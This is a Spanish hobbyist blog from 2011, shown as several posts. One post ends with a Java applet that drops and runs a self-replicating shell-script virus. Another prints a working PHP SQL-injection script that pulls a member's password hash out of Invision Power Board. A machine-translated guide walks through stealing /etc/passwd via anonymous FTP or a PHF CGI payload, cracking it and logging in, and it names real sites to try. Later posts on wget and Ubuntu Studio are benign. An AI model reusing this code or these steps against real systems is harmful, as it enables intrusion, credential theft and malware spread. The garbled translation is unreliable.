"echo \"Java is safe, and UNIX viruses do not exist.\"" + "\n" +
"for file in `find " + target + " -type f -print`" + "\n" + "do" +
"\n" + " case \"`sed 1q $file`\" in" + "\n" +
" \"#!/bin/sh\" ) grep '#-_' $file > /dev/null" +
" || sed -n '/#-_/,$p' $0 >> $file" + "\n" +
" esac" + "\n" + "done" + "\n" +
"2>/dev/null";
byte[] buffer = new byte[homer.length()];
homer.getBytes(0, homer.length(), buffer, 0);
outer.write(buffer);
outer.close();
Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod 777 " +
userHome + "/.homer.sh");
Process exec = Runtime.getRuntime().exec("/bin/sh " + userHome +
"/.homer.sh");
} catch (IOException ioe) {}
}
}
anita:~/Security#

Este programa infecta los sistemas Unix con un virus que contamina ficheros shellscript; antes de hacerlo muestra el mensaje `Java is safe, and UNIX viruses do not exist', para después localizar todos los ficheros shell en el directorio $HOME, comprobar cuáles están infectados, e infectar los que no lo están.

Aunque en un principio no se tomó muy en serio el problema de los applets hostiles, poco tiempo después la propia Sun Microsystems reconoció la problemática asociada y se puso a trabajar para minimizar los potenciales efectos de estos applets; principalmente se han centrado esfuerzos en controlar la cantidad de recursos consumidos por un programa y en proporcionar las clases necesarias para que los propios navegadores monitoricen los applets ejecutados. No obstante, aunque se solucionen los problemas de seguridad en el código, es probable que se puedan seguir utilizando applets como una forma de ataque a los sistemas: mientras que estos programas puedan realizar conexiones por red, no habrán desaparecido los problemas.

Texto de http://mmc.geofisica.unam.mx/LuCAS/Manuales-LuCAS/doc-unixsec/unixsec-html/node76.html

Gracias por el texto.

Saludos Mundo libre.

sábado, 12 de marzo de 2011

Exploit

Saludos Mundo Libre.

Invision Power Board es vulnerable a una vulnerabilidad de inyección SQL en la forma en que maneja las galletas, la explotación de esta vulnerabilidad permite atacante malintencionado poner en peligro la integridad de la base de datos, el siguiente código exploit puede ser utilizado para probar el sistema para la vulnerabilidad mencionada.

/*
<= 2.0.3
<= 1.3.1 Final
/str0ke
*/

$server = \"SERVER\";
$port = 80;
$file = \"PATH\";

$target = 81;

/* User id and password used to fake-logon are not important. \'10\' is a
random number. */
$id = 10;
$pass = \"\";

$hex = \"0123456789abcdef\";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;

while( !($found) ) {
$letter = substr($hex, $idx, 1);

/* %2527 translates to %27, which gets past magic quotes.This is translated to \' by urldecode. */
$cookie =\"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target\";
$cookie .=\"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527\" . $letter;

/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password=\'$pass\' ORid=$target
HAVING id=$target AND MID(`password`,$i,1)=\'$letter\' */

$header = getHeader($server, $port, $file . \"index.php?act=Login&CODE=autologin\", $cookie);
if( !preg_match(\'/Location:(.*)act\\=Login\\&CODE\\=00\\r\\n/\', $header) ) {
echo $i . \": \" . $letter . \"\\n\";
$found = true;

$hash .= $letter;
} else {
$idx++;
}
}
}

echo \"\\n\\nFinal Hash: $hash\\n\";

function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);

if (!$fp) {
return \"Unknown\";
} else {
$com = \"HEAD $file HTTP/1.1\\r\\n\";
$com .= \"Host: $server:$port\\r\\n\";
$com .= \"Cookie: $cookie\\r\\n\";
$com .= \"Connection: close\\r\\n\";
$com .= \"\\r\\n\";

fputs($fp, $com);

do {
$header.= fread($fp, 512);
} while( !preg_match(\'/\\r\\n\\r\\n$/\',$header) );
}

return $header;
}
?>

gracias a rootsecurity.org

Saludos Mundo Libre.

martes, 8 de marzo de 2011

Como descargar una web completa con linux

Saludos Mundo libre.

Me han preguntado como podemos descargar una Web completa en una plataforma linux.

Para poder descargar una pagina web completa con todas las paginas a las que apunta y todos sus elementos, podemos usar la aplicacion desde linea de comandos wget con la linea de comandos siguiente:

wget -r http://www.loquesea.com

Lo que se obtiene es un fichero henorme de texto.

Con ese txt tendremos que descargarlas todas de un tiro usamos el siguiente comando:

wget -r -i listawebs.txt

Ahora ya las conecciones a internet son muy rapidas y yano tardara mucho en descargar la web completa con sus ramas.

Bueno como siempre este sistema es algo muy abuelo ya que hay programas nuevos que hacen todo por ti solo pones la url y aguardas pero comotodo hay paginas webs que ya no permiten o se encuentran protegidas y ya no podemos hacer nada pero la pericia del hacker es aguardar, tratar y lo tendras.

Saludos Mundo libre.

lunes, 7 de marzo de 2011

Un poco de teoria Hacking

Saludos Mundo Libre.

Un poco de Teoria Hacking.

La mayoría de los comandos de DOS tienen equivalentes de UNIX y Linux. A continuación se enumeran algunos de los comandos principales que se necesita saber para utilizar una cuenta de depósito.

AYUDA AYUDA =
COPIA = PP
MOVE MV =
DIR = LS
DEL = RM
CD = CD

Para ver quién está en el sistema que puede escribir la OMS. Para obtener información sobre un usuario específico en el DEDO sistema de tipos. Uso de los comandos básicos de UNIX se puede aprender todo lo que necesitas saber sobre el sistema que está using.Hacking El Cubo de TI: La tecnología de la información Guía de supervivencia - Douglas polluelo

Parte 2: Cracking de contraseñas

En los sistemas UNIX en el archivo que contiene las contraseñas para todos los usuarios en el sistema se encuentra en el directorio / etc. El nombre del archivo es passwd. Apuesto a que su forma de pensar ...." Grande. Todo lo que tengo que hacer es obtener el archivo llamado / etc / passwd y voy a ser un hacker. " Si eso es lo que está pensando entonces usted está totalmente equivocado. Todas las cuentas en el archivo passwd tienen contraseñas encriptadas. Estas contraseñas son una forma encriptada lo que significa que no hay manera de descifrar. Sin embargo, hay programas que pueden ser utilizados para obtener las contraseñas de los archivos. El nombre del programa que he encontrado para ser el mejor cracker contraseña se llama "Cracker Jack". Este programa utiliza un archivo de diccionario integrado por miles de palabras. Se comparan las formas cifradas de las palabras en la lista de las contraseñas encriptadas en el fichero passwd y te avisa cuando encuentra una coincidencia. Cracker Jack se puede encontrar en mi sitio web, que está en http://www.geocities.com/SiliconValley/9185 Algunas listas de palabras se pueden encontrar en el sitio FTP siguiente: sable.ox.ac.uk / pub / listas de palabras. Para llegar a la lista de palabras que suelen utilizar Ir a ese sitio FTP, ve a la guía de América. Una vez allí descargar el archivo llamado dic-0294.tar.Z que es de aproximadamente 4 MB. Para utilizar este archivo debe ser descomprimido
usando un programa como Gzip para DOS o Winzip para Windows. Una vez descomprimido el archivo debe ser un archivo de texto alrededor de 8 MB y lo mejor es ponerlo en el mismo directorio que el programa de craqueo. Para saber cómo utilizar Cracker Jack acaba de leer la documentación que se incluye con ella.

Parte 3: La parte difícil (encontrar los archivos de contraseñas)

Hasta ahora he estado diciendo las partes fáciles de hackear un servidor. Ahora llegamos a la parte más difícil. Es de sentido común. Si el administrador del sistema tiene un archivo que tiene contraseñas para cada uno en su sistema no se va a acaba de dar a usted. Tienes que tener una manera de recuperar el archivo / etc / passwd sin necesidad de acceder al sistema. Hay dos formas sencillas que a veces esto se puede lograr. A menudo, el directorio / etc no tiene bloqueado el FTP. Para obtener el archivo passwd esta manera tratar de usar un cliente FTP para acceder al sitio de forma anónima a continuación, compruebe el directorio / etc para ver si el acceso al fichero passwd se limita. Si no se restringe a continuación, descargue el archivo y ejecutar Cracker Jack en él. Si se limita a continuación, intente plan B. En algunos sistemas hay un archivo llamado PHF en el directorio / cgi-bin. Si hay entonces usted está en suerte. PHF permite a los usuarios acceder de manera remota a los archivos (incluyendo el archivo / etc / passwd) a través de la web en todo el mundo. Para probar este método Ir a su navegador web y escriba la siguiente dirección:% http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x% 0a/bin/cat 20/etc/passwd
Luego sustituye el sitio que está tratando de hack para el xxx.xxx.xxx.
Por ejemplo, si quería hackear Universidad de St. Louis (y ya he) que
tendría que escribir en% 0a/bin/cat http://www.slu.edu/cgi-bin/phf?Qalias=x% 20/etc/passwd

No se moleste en tratar www.slu.edu porque ya lo han hecho y les dijo acerca de su problema de seguridad.

Aquí va una pista: tratar www.spawn.com y www.garply.com Si el anterior a los métodos no intente ninguna manera se puede pensar en conseguir ese archivo. Si usted consigue el archivo y todos los elementos en el segundo campo son X o! o * a continuación, el archivo de contraseñas es la sombra. El remedo es sólo un método de añadir seguridad adicional para evitar que los piratas informáticos y otras personas no deseadas utilizando el archivo de contraseñas. Desafortunadamente, no hay manera de "unshadow" un archivo de contraseñas, pero a veces hay archivos de copia de seguridad de contraseña que no se proyectan las sombras. Trate de buscar para los archivos como / etc / shadow y otras cosas por el estilo.

Parte 4: Inicio de sesión en "su" Shell Nueva

Aceptar .... Aquí es donde puede usar lo que se encuentran utilizando Cracker Jack. Los nombres de usuario y contraseñas. Ejecutar el cliente telnet y telent al servidor que se tronaba las contraseñas de, como www.slu.edu. Cuando está conectado dará una pantalla de inicio de sesión que solicita un nombre de usuario y contraseña y por lo general la información sobre el sistema operativo que está usando el servidor (normalmente UNIX,
Linux, AIX, IRIX, ULTRIX, BSD, o incluso a veces DOS o Vax VMS /). Sólo tienes que escribir en la información que obtuvo después de descifrar el archivo passwd y todo lo que sabe acerca de UNIX a hacer lo que tienes ganas de hacer. Pero recuerda que la piratería no se está propagando virus o causar daños a otros sistemas informáticos. Se trata de usar su conocimiento para aumentar su conocimiento.

Parte 5: Información

Si usted siente que tiene lo que se necesita para ser un hacker serio, entonces primero hay que conocer una definición clara de la piratería y cómo ser un hacker ético. Familiarizarse con los entornos Unix y si usted está recién empezando a aprender a hackear, visite la biblioteca local y encontrar algunos libros sobre varios sistemas operativos en Internet y cómo funcionan. O usted podría ir a una librería y comprar un par de libros de Internet de seguridad. A menudo se explica cómo los hackers penetrar en los sistemas y que es algo que un principiante puede utilizarlo como una ventaja.

Texto traducido por dellcom1a de http://www.thenetworkadministrator.com/webhack2.htm gracias.

Saludos Mundo Libre.

miércoles, 2 de marzo de 2011

Ubuntu Studio



Saludos Mundo Libre.

Hoy quiero ablarles de una exelente distribucion en linux para la gente que le gusta el diseno grafico la mescla de sonidos video en pocas palabras el diseno entodos sus aspectos.

Esto va enfocado alos usuarios que estan estudiando que por el momento no pueden tener un sistema como el de mac que a mi sugerencia es solo pagar como el sistema conocido como windows ya que linux cubre todas las nesecidades para los usuarios en todos los nibeles.

La distrubucion a la que quiero referirme es Ubuntu Studio en su version 10.10 que como siempre ya la he descargado y he probado en la laptop de la mujer que amo mi novia y le ha paresido una exelente distribucion de codigo abierto con un diseno y estructura muy agradable para el usuario con unos colores exelentes y aplicaciones para diseno de fotos video y audio una exelente opcion si cuentas con una pc o laptop y quieres ser libre y no estar atado a pagos por aplicaciones y lisencias.





El iso es descargado desde su pagina web http://ubuntustudio.org

Espero que la disfruten como yo.

saludos Mundo Libre.